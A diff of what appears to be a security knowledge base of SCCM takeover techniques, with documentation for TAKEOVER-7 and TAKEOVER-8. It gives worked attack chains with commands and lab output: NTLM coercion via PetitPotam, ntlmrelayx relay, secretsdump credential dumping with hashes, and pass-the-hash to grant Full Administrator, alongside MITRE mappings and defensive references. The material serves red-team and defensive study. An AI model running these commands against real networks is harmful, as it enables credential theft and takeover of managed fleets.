[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening at port 1080
[*] IMAPS Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
```
[*] Servers started, waiting for connections
```
3. From the attacker host, coerce NTLM authentication from the passive site server via SMB, targeting the relay server's IP address:
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd <NTLMRELAYX_LISTENER_IP> <PASSIVE_SITE_SERVER_IP>
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd <NTLMRELAYX_LISTENER_IP> <PASSIVE_SITE_SERVER_IP>
Trying pipe lsarpc
[-] Connecting to ncacn_np:passive.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Trying pipe lsarpc
[-] Connecting to ncacn_np:passive.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
```
After a few seconds, you should receive an SMB connection on the relay server that is forwarded to the SMB service on the site server and the authenticated session is held open:
After a few seconds, you should receive an SMB connection on the relay server that is forwarded to the SMB service on the site server and the authenticated session is held open
```
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.141, attacking target smb://10.10.100.121
[*] Authenticating against smb://10.10.100.121 as LAB/PASSIVE$ SUCCEED
[*] SOCKS: Adding LAB/PASSIVE$@10.10.100.121(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.141 controlled, but there are no more targets left!
[*] SOCKS: Proxying client session for LAB/PASSIVE$@10.10.100.121(445)
```
```
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.141, attacking target smb://10.10.100.121
[*] Authenticating against smb://10.10.100.121 as LAB/PASSIVE$ SUCCEED
[*] SOCKS: Adding LAB/PASSIVE$@10.10.100.121(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.141 controlled, but there are no more targets left!
[*] SOCKS: Proxying client session for LAB/PASSIVE$@10.10.100.121(445)
```
5. Proxy `secretsdump.py` in the context of the passive site server through the authenticated session to authenticate to the primary site server and recover its hashed credential:
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# proxychains secretsdump.py lab/passive\$@sccm.internal.lab
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.100.121:445 ... OK
[*] Target system bootKey: 0x436a3e67c2c89ded60aeb1f1819428c8
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:003d349493bc6acfb242ae5c2ff3d819:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
lab\SCCM$:aes256-cts-hmac-sha1-96:76bf72e59677dfe072fd6609ccdc1343d318f7cc557b25588b36046747f80172
lab\SCCM$:aes128-cts-hmac-sha1-96:b2d7f1a79de08211ae6a518c82a715f4
lab\SCCM$:des-cbc-md5:5de98a07aefb983e
```
5. Proxy `secretsdump.py` in the context of the passive site server through the authenticated session to recover the primary site server's hashed credential
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# proxychains secretsdump.py lab/passive\$@sccm.internal.lab
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.100.121:445 ... OK
[*] Target system bootKey: 0x436a3e67c2c89ded60aeb1f1819428c8
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:003d349493bc6acfb242ae5c2ff3d819:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
lab\SCCM$:aes256-cts-hmac-sha1-96:76bf72e59677dfe072fd6609ccdc1343d318f7cc557b25588b36046747f80172
lab\SCCM$:aes128-cts-hmac-sha1-96:b2d7f1a79de08211ae6a518c82a715f4
lab\SCCM$:des-cbc-md5:5de98a07aefb983e
```
6. Use `sccmhunteer` as the site server to the Administration Service API and add an arbitrary user as Full Admin
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/sccmhunter]
└─# python3 sccmhunter.py admin -u sccm\$ -p aad3b435b51404eeaad3b435b51404ee:6963d86f6d65497d7b2126d44e6cdb4e -ip 10.10.100.121
[06:53:08 PM] INFO [!] Enter help for extra shell commands
() C:\ >> show_admins
[06:53:11 PM] INFO Tasked SCCM to list current SMS Admins.
[06:53:11 PM] INFO Current Full Admin Users:
[06:53:11 PM] INFO lab\Administrator
() (C:\) >> get_user specter
[06:53:13 PM] INFO [*] Collecting users...
[06:53:13 PM] INFO [+] User found.
[06:53:14 PM] INFO ------------------------------------------
DistinguishedName: CN=specter,OU=DOMUSERS,DC=internal,DC=lab
FullDomainName: INTERNAL.LAB
FullUserName: specter
Mail:
NetworkOperatingSystem: Windows NT
ResourceId: 2063597574
sid: S-1-5-21-2391214593-4168590120-2599633397-1109
UniqueUserName: lab\specter
UserAccountControl: 66048
UserName: specter
UserPrincipalName: specter@internal.lab
------------------------------------------
() (C:\) >> add_admin specter S-1-5-21-2391214593-4168590120-2599633397-1109
[06:53:19 PM] INFO Tasked SCCM to add specter as an administrative user.
[06:53:19 PM] INFO [+] Successfully added specter as an admin.
() (C:\) >> show_admins
[06:53:20 PM] INFO Tasked SCCM to list current SMS Admins.
[06:53:20 PM] INFO Current Full Admin Users:
[06:53:20 PM] INFO lab\Administrator
[08:46:39 PM] INFO specter
```
6. Use `sccmhunter` as the primary site server to the Administration Service API and add an arbitrary user as Full Administrator:
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/sccmhunter]
└─# python3 sccmhunter.py admin -u sccm\$ -p aad3b435b51404eeaad3b435b51404ee:6963d86f6d65497d7b2126d44e6cdb4e -ip 10.10.100.121
[06:53:08 PM] INFO [!] Enter help for extra shell commands
() C:\ >> show_admins
[06:53:11 PM] INFO Tasked SCCM to list current SMS Admins.
[06:53:11 PM] INFO Current Full Admin Users:
[06:53:11 PM] INFO lab\Administrator
() (C:\) >> get_user specter
[06:53:13 PM] INFO [*] Collecting users...
[06:53:13 PM] INFO [+] User found.
[06:53:14 PM] INFO ------------------------------------------
DistinguishedName: CN=specter,OU=DOMUSERS,DC=internal,DC=lab
FullDomainName: INTERNAL.LAB
FullUserName: specter
Mail:
NetworkOperatingSystem: Windows NT
ResourceId: 2063597574
sid: S-1-5-21-2391214593-4168590120-2599633397-1109
UniqueUserName: lab\specter
UserAccountControl: 66048
UserName: specter
UserPrincipalName: specter@internal.lab
------------------------------------------
() (C:\) >> add_admin specter S-1-5-21-2391214593-4168590120-2599633397-1109
[06:53:19 PM] INFO Tasked SCCM to add specter as an administrative user.
[06:53:19 PM] INFO [+] Successfully added specter as an admin.
() (C:\) >> show_admins
[06:53:20 PM] INFO Tasked SCCM to list current SMS Admins.
[06:53:20 PM] INFO Current Full Admin Users:
[06:53:20 PM] INFO lab\Administrator
[08:46:39 PM] INFO specter
```
## References
- Chris Thompson, SCCM Site Takeover via Automatic Client Push Installation, https://posts.specterops.io/sccm-site-takeover-via-automatic-client-push-installation-f567ec80d5b1
- Garrett Foster, SCCM Hierarchy Takeover with High Availability, https://medium.com/specter-ops-posts/sccm-hierarchy-takeover-with-high-availability-7dcbd3696b43
- Microsoft, Site server high availability in Configuration Manager, https://learn.microsoft.com/en-us/mem/configmgr/core/servers/deploy/configure/site-server-high-availability
- Chris Thompson, [SCCM Site Takeover via Automatic Client Push Installation](https://posts.specterops.io/sccm-site-takeover-via-automatic-client-push-installation-f567ec80d5b1)
- Garrett Foster, [SCCM Hierarchy Takeover with High Availability](https://medium.com/specter-ops-posts/sccm-hierarchy-takeover-with-high-availability-7dcbd3696b43)
- Microsoft, [Site server high availability in Configuration Manager](https://learn.microsoft.com/en-us/mem/configmgr/core/servers/deploy/configure/site-server-high-availability)
@@ -1,190 +0,0 @@
# TAKEOVER-7
## Description
Hierarchy Takeover via NTLM Coercion and SMB Relay From Passive Site Server
## MITRE ATT&CK TTPs
- [T1078.002 - Valid Accounts](https://attack.mitre.org/techniques/T1078/002/)
- [T1187 - Forced Authentication](https://attack.mitre.org/techniques/T1187/)
- [T1003.004 - OS Credential Dumping](https://attack.mitre.org/techniques/T1003/004/)
## Requirements
Valid domain credentials with network connectivity to the passive primary site server and active primary site server.
## Summary
For high availability configurations the passive site server role is deployed to SCCM sites where redundancy for the site server role is required. A passive site server shares the same configuration and privileges as the active site server yet performs no writes or changes to the site until promoted manually or during an automated failover. During setup, the passive site server is [required](https://learn.microsoft.com/en-us/mem/configmgr/core/servers/deploy/configure/site-server-high-availability#configurations-for-the-site-server-in-passive-mode) to be a member of the active site server's local administrator group. In default setups, SMB signing is not enforced on either site server host operating system and are vulnerable to NTLM relay attacks.
## Impact
This technique may allow an attacker to relay a passive site server machine account to the primary site server host and compromise and primary site server machine account. With control of this account, an attacker could perform a pass-the-hash (PtH) attack to authenticate to the administration service hosted on the site server operating system and elevate their privileges to "Full Administrator" for the SCCM Hierarchy. If successful, this technique enables lateral movement to all SCCM clients and/or sensitive systems.
## Defensive IDs
## Examples
- Use SCCMHunter to profile SCCM site system server roles
- Use PetitPotam to coerce authentication from passive site server
- Use NTLMRelayx to relay credentials to SMB service on active site server
- Proxy secretsdump to recover active site server credentials
- Use SCCMHunter to PtH and add an arbitrary admin user
### SCCMHunter
The results of the `find` module indicate:
- The *SCCM.INTERNAL.LAB* and *PASSIVE.INTERNAL.LAB* sytems are both site servers in the "LAB" site
- The *SCCM.INTERNAL.LAB* host is the active site server and the *PASSIVE.INTERNAL.LAB* host is the passive site server
- SMB signing is disabled on both systems
```
[04:24:43 PM] INFO [+] Finished profiling Site Servers.
[04:24:43 PM] INFO +----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
| Hostname | SiteCode | SigningStatus | SiteServer | SMSProvider | Active | Passive | MSSQL |
+======================+===================+=================+==============+===============+==========+===========+=========+
| sccm.internal.lab | LAB | False | True | True | True | False | False |
+----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
| passive.internal.lab | LAB | False | True | True | False | True | False |
+----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+
```
### PetitPotam
- Valid domain credentials are used to coerce authentication from the *PASSIVE.INTERNAL.LAB* passive site server to the attacker host
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd 10.10.100.136 passive.internal.lab
Trying pipe lsarpc
[-] Connecting to ncacn_np:passive.internal.lab[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
### NTLMRelayx
- Authentication from the *PASSIVE.INTERNAL.LAB* site server is caught and relayed from the attacker host to the *SCCM.INTERNAL.LAB* active site server. The `-socks` flag is used to hold the authenticated session open
```
┌──(adminservice)─(root㉿DEKSTOP-2QO0YEUW)-[/opt/impacket/examples]
└─# python3 ntlmrelayx.py -t 10.10.100.121 -smb2support -socks
Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening at port 1080
[*] IMAPS Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] IMAP Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
* Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver'
* Debug mode: off
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.141, attacking target smb://10.10.100.121
[*] Authenticating against smb://10.10.100.121 as LAB/PASSIVE$ SUCCEED
[*] SOCKS: Adding LAB/PASSIVE$@10.10.100.121(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.141 controlled, but there are no more targets left!
[*] SOCKS: Proxying client session for LAB/PASSIVE$@10.10.100.121(445)
```
### Secretsdump
- Secretsdump is proxied through the existing authenticated session to recover the *SCCM.INTERNAL.LAB* site server's hashed credential
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam]
└─# proxychains secretsdump.py lab/passive\$@sccm.internal.lab
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.100.121:445 ... OK
[*] Target system bootKey: 0x436a3e67c2c89ded60aeb1f1819428c8
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:003d349493bc6acfb242ae5c2ff3d819:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
lab\SCCM$:aes256-cts-hmac-sha1-96:76bf72e59677dfe072fd6609ccdc1343d318f7cc557b25588b36046747f80172
lab\SCCM$:aes128-cts-hmac-sha1-96:b2d7f1a79de08211ae6a518c82a715f4
lab\SCCM$:des-cbc-md5:5de98a07aefb983e
```
### SCCMHunter
- The recovered active site server machine account hash is used to authenticate to the Administration Service API and add an arbitrary user as Full Admin
```
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/sccmhunter]
└─# python3 sccmhunter.py admin -u sccm\$ -p aad3b435b51404eeaad3b435b51404ee:6963d86f6d65497d7b2126d44e6cdb4e -ip 10.10.100.121
[06:53:08 PM] INFO [!] Enter help for extra shell commands
() C:\ >> show_admins
[06:53:11 PM] INFO Tasked SCCM to list current SMS Admins.
[06:53:11 PM] INFO Current Full Admin Users:
[06:53:11 PM] INFO lab\Administrator
() (C:\) >> get_user specter
[06:53:13 PM] INFO [*] Collecting users...
[06:53:13 PM] INFO [+] User found.
[06:53:14 PM] INFO ------------------------------------------
DistinguishedName: CN=specter,OU=DOMUSERS,DC=internal,DC=lab
FullDomainName: INTERNAL.LAB
FullUserName: specter
Mail:
NetworkOperatingSystem: Windows NT
ResourceId: 2063597574
sid: S-1-5-21-2391214593-4168590120-2599633397-1109
UniqueUserName: lab\specter
UserAccountControl: 66048
UserName: specter
UserPrincipalName: specter@internal.lab
------------------------------------------
() (C:\) >> add_admin specter S-1-5-21-2391214593-4168590120-2599633397-1109
[06:53:19 PM] INFO Tasked SCCM to add specter as an administrative user.
[06:53:19 PM] INFO [+] Successfully added specter as an admin.
() (C:\) >> show_admins
[06:53:20 PM] INFO Tasked SCCM to list current SMS Admins.
[06:53:20 PM] INFO Current Full Admin Users:
[06:53:20 PM] INFO lab\Administrator
[08:46:39 PM] INFO specter
```
## References
Author, Title, URL
@@ -20,7 +20,6 @@ Hierarchy takeover via NTLM coercion and relay HTTP to LDAP on domain controller
- The `WebClient` service is installed and started
- `BlockNTLM` = `0` or not present, or = `1` and `BlockNTLMServerExceptionList` contains attacker relay server
- `RestrictSendingNTLMTraffic` = `0`, `1`, or not present, or = `2` and `ClientAllowedNTLMServers` contains attacker relay server
- Domain computer account is not in `Protected Users`
- Domain computer account is not `is sensitive and cannot be delegated`
- Domain controller settings:
- `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains coercion target
@@ -35,16 +34,18 @@ Hierarchy takeover via NTLM coercion and relay HTTP to LDAP on domain controller
- `RestrictNTLMInDomain` = `0` or not present, or is configured with any value and `DCAllowedNTLMServers` contains relay target
- For resource-based constrained delegation:
- Control of an account's SPN
OR
OR
- `MachineAccountQuota` > `0` and domain users permitted to add computer accounts
## Summary
An attacker who is able to successfully coerce NTLM authentication from the Active Directory domain computer account for a primary site server, system hosting the SMS Provider role, or passive site server via HTTP and relay it to LDAP on a domain controller can conduct resource-based constrained delegation (RBCD) or shadow credentials attacks to compromise the server, then connect to:
- MSSQL on the site database as the site server or SMS Provider (see TAKEOVER-1)
- SMB on the site database as the site server (see TAKEOVER-2)
- SMB on the SMS Provider as the site server (see TAKEOVER-6)
- MSSQL on the site database as the site server or SMS Provider (see [TAKEOVER-1](../TAKEOVER-1/takeover-1_description.md))
- SMB on the site database as the site server (see [TAKEOVER-2](../TAKEOVER-2/takeover-2_description.md))
- SMB on the SMS Provider as the site server (see [TAKEOVER-6](../TAKEOVER-6/takeover-6_description.md))
- SMB on the site database server or an SMS Provider as itself
- SMB on the primary site server as a passive site server, or vice versa (see TAKEOVER-7)
- SMB on the primary site server as a passive site server, or vice versa (see [TAKEOVER-7](../TAKEOVER-7/takeover-7_description.md))
The attacker can use these permissions to grant an arbitrary domain account the SCCM "Full Administrator" role.
@@ -52,7 +53,10 @@ The attacker can use these permissions to grant an arbitrary domain account the
The "Full Administrator" security role is granted all permissions in Configuration Manager for all scopes and all collections. An attacker with this privilege can execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on. They can also leverage tools such as CMPivot and Run Script to query or execute scripts on client devices in real-time using the AdminService or WMI on an SMS Provider.
## Defensive IDs
- [DETECT-1: Monitor site server domain computer accounts authenticating from another source](../../../defense-techniques/DETECT/DETECT-1/detect-1_description.md)
- [PREVENT-13: Require LDAP channel binding and signing](../../../defense-techniques/PREVENT/PREVENT-13/prevent-13_description.md)
- [PREVENT-16: Remove SeMachineAccountPrivilege and set MachineAccountQuota to 0 for non-admin accounts](../../../defense-techniques/PREVENT/PREVENT-16/prevent-16_description.md)
- [PREVENT-20: Block unnecessary connections to site systems](../../../defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md)
## Subtechniques
- TAKEOVER-8.1: Coerce primary site server
@@ -64,7 +68,6 @@ The "Full Administrator" security role is granted all permissions in Configurati
The steps to execute TAKEOVER-8.1 through TAKEOVER-8.4 are mostly the same except that a different system is targeted for coercion of NTLM authentication.
1. On the attacker relay server, start `ntlmrelayx`, targeting the IP address of the domain controller and the LDAPS service and specifying options to conduct a resource-based constrained delegation attack:
```
# impacket-ntlmrelayx --no-smb-server --no-wcf-server --no-raw-server -ts -ip <NTLMRELAY_LISTENER_IP> -t ldaps://<DOMAIN_CONTROLLER_IP> --http-port 8080 --no-da --delegate-access
Impacket v0.11.0 - Copyright 2023 Fortra
@@ -87,7 +90,6 @@ The steps to execute TAKEOVER-8.1 through TAKEOVER-8.4 are mostly the same excep
```
3. From the attacker host, coerce NTLM authentication from the coercion target via HTTP, targeting the relay server's IP address and the specified port:
```
# python3 PetitPotam.py -d MAYYHEM.LOCAL -u lowpriv -p <PASSWORD> <NTLMRELAYX_NETBIOSNAME>@8080/a <COERCION_TARGET_IP>
@@ -102,11 +104,9 @@ The steps to execute TAKEOVER-8.1 through TAKEOVER-8.4 are mostly the same excep
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```
After a few seconds, you should receive an HTTP connection on the relay server that is forwarded to the domain controller to execute the RBCD attack:
```
[2024-02-28 21:01:54] [*] HTTPD(8080): Connection from 192.168.57.50 controlled, attacking target ldaps://192.168.57.100
[2024-02-28 21:01:54] [*] HTTPD(8080): Authenticating against ldaps://192.168.57.100 as MAYYHEM/SITE-SERVER$ SUCCEED
@@ -121,13 +121,13 @@ The steps to execute TAKEOVER-8.1 through TAKEOVER-8.4 are mostly the same excep
4. Obtain a service ticket for the created or specified account with an SPN, impersonating the coercion target.
5. Pass the ticket, access the coercion target, escalate to `SYSTEM`, and connect to:
- MSSQL on the site database as a site server or SMS Provider (TAKEOVER-1)
- AdminService on an SMS Provider as a site server (TAKEOVER-2)
- SMB on the site database or an SMS Provider as a site server
- MSSQL on the site database as a site server or SMS Provider ([TAKEOVER-1](../TAKEOVER-1/takeover-1_description.md))
- AdminService on an SMS Provider as a site server ([TAKEOVER-2](../TAKEOVER-2/takeover-2_description.md))
- SMB on the site database or an SMS Provider as a site server ([TAKEOVER-6](../TAKEOVER-6/takeover-6_description.md))
- SMB on the site database server or an SMS Provider as itself
- SMB on the site server as a passive site server
- SMB on the site server as a passive site server, or vice versa ([TAKEOVER-7](../TAKEOVER-7/takeover-7_description.md))
## References
- Chris Thompson, Coercing NTLM Authentication from SCCM Servers, https://posts.specterops.io/coercing-ntlm-authentication-from-sccm-e6e23ea8260a
- Elad Shamir, Wagging the Dog: Abusing Resource-based Constrained Delegation to Attack Active Directory, https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
- Garrett Foster, SCCM Hierarchy Takeover with High Availability, https://posts.specterops.io/sccm-hierarchy-takeover-with-high-availability-7dcbd3696b43
- Chris Thompson, [Coercing NTLM Authentication from SCCM Servers](https://posts.specterops.io/coercing-ntlm-authentication-from-sccm-e6e23ea8260a)
- Elad Shamir, [Wagging the Dog: Abusing Resource-based Constrained Delegation to Attack Active Directory](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
- Garrett Foster, [SCCM Hierarchy Takeover with High Availability](https://posts.specterops.io/sccm-hierarchy-takeover-with-high-availability-7dcbd3696b43)
@@ -0,0 +1,28 @@
# TAKEOVER-9
## Description
Crawl site database links configured with DBA privileges
## MITRE ATT&CK TTPs
- [TTP-ID](https://attack.mitre.org/LINK) - Description
## Requirements
-
-
## Summary
## Impact
## Defensive IDs
- [ID: Description](Link)
## Subtechniques
-
-
## Examples
## References
- Author, [Title](URL)
@@ -1,5 +1,5 @@
| Codename | Description | Notes | Links |
|----------|-------------|-------| ----- |
| Codename | Description |
|----------|-------------|
| TAKEOVER-1 | Hierarchy takeover via NTLM coercion and relay to MSSQL on remote site database
&emsp;TAKEOVER-1.1: Coerce primary site server
&emsp;TAKEOVER-1.2: Coerce SMS Provider
@@ -28,4 +28,5 @@
&emsp;TAKEOVER-8.1: Coerce primary site server
&emsp;TAKEOVER-8.2: Coerce SMS Provider
&emsp;TAKEOVER-8.3: Coerce passive site server
&emsp;TAKEOVER-8.4: Coerce site database server
&emsp;TAKEOVER-8.4: Coerce site database server
| TAKEOVER-9 | Hierarchy takeover via crawling site database links configured with DBA privileges |
+25 -24
View File
@@ -1,24 +1,25 @@
| Codename | Description |
|----------|-------------|
| CRED-1 | Retrieve secrets from PXE boot media |
| CRED-2 | Request machine policy and deobfuscate secrets |
| CRED-3 | Dump currently deployed secrets via WMI |
| CRED-4 | Retrieve legacy secrets from the CIM repository |
| CRED-5 | Dump credentials from the site database |
| ELEVATE-1 | NTLM relay site server to SMB on site systems |
| ELEVATE-2 | NTLM relay via automatic client push installation
| EXEC-1 | Application deployment |
| EXEC-2 | PowerShell script execution |
| RECON01 | Remote LDAP Recon |
| RECON02 | Remote SMB Recon |
| RECON03 | Remote HTTP(s) Recon |
| RECON04 | CMPivot Recon |
| TAKEOVER-1 | NTLM coercion and relay to MSSQL on remote site database |
| TAKEOVER-2 | NTLM coercion and relay to SMB on remote site database |
| TAKEOVER-3 | NTLM coercion and relay to HTTP on ADCS |
| TAKEOVER-4 | NTLM coercion and relay from CAS to origin primary site server |
| TAKEOVER-5 | NTLM coercion and relay to AdminService on remote SMS Provider |
| TAKEOVER-6 | NTLM coercion and relay to SMB on remote SMS Provider |
| TAKEOVER-7 | NTLM coercion and relay to SMB between primary and passive site servers |
| TAKEOVER-8 | NTLM coercion and relay HTTP to LDAP on domain controller |
| TAKEOVER-9 | Crawl site database links configured with DBA privileges |
| Codename | Description | Security Context | Network Access |
|----------|-------------|------------------|----------------|
| CRED-1 | Retrieve secrets from PXE boot media | Unauthenticated | Internal network |
| CRED-2 | Request machine policy and deobfuscate secrets | Domain computer creds | Internal network |
| CRED-3 | Dump currently deployed secrets via WMI | Client device admin | Any |
| CRED-4 | Retrieve legacy secrets from the CIM repository | Client device admin | Any |
| CRED-5 | Dump credentials from the site database | Primary site server admin, site database read | Internal network |
| ELEVATE-1 | NTLM relay site server to SMB on site systems | Domain user creds | Internal network |
| ELEVATE-2 | NTLM relay via automatic client push installation | Domain user creds | Internal network |
| EXEC-1 | Application deployment | SCCM administrator | Internal network |
| EXEC-2 | PowerShell script execution | SCCM administrator | Internal network |
| RECON-1 | Enumerate SCCM site information via LDAP | Authenticated domain user | Internal network |
| RECON-2 | Enumerate SCCM roles via SMB | Authenticated domain user | Internal network |
| RECON-3 | Enumerate SCCM roles via HTTP | Authenticated domain user | Internal network |
| RECON-4 | Query client devices via CMPivot | SCCM administrator | Internal network |
| RECON-5 | Locate users via SMS Provider | SCCM administrator | Internal network |
| TAKEOVER-1 | NTLM coercion and relay to MSSQL on remote site database | Domain user creds | Internal network |
| TAKEOVER-2 | NTLM coercion and relay to SMB on remote site database | Domain user creds | Internal network |
| TAKEOVER-3 | NTLM coercion and relay to HTTP on AD CS | Domain user creds | Internal network |
| TAKEOVER-4 | NTLM coercion and relay from CAS to origin primary site server | Domain user creds | Internal network |
| TAKEOVER-5 | NTLM coercion and relay to AdminService on remote SMS Provider | Domain user creds | Internal network |
| TAKEOVER-6 | NTLM coercion and relay to SMB on remote SMS Provider | Domain user creds | Internal network |
| TAKEOVER-7 | NTLM coercion and relay to SMB between primary and passive site servers | Domain user creds | Internal network |
| TAKEOVER-8 | NTLM coercion and relay HTTP to LDAP on domain controller | Domain user creds | Internal network |
| TAKEOVER-9 | Crawl site database links configured with DBA privileges | Authenticated database user | Internal network |
+3 -3
View File
@@ -16,13 +16,13 @@ This is the bulk of the content
## Impact
Brief description of impact
## Defensive IDs
- [ID: Description](Link)
## Subtechniques
-
-
## Defensive IDs
- [ID: Description](Link)
## Examples
Operational examples
@@ -1,11 +1,9 @@
# DETECT-2
## Description
Monitor the read access requests of the `System Management` container within Active Directory Users and Computers.
## Summary
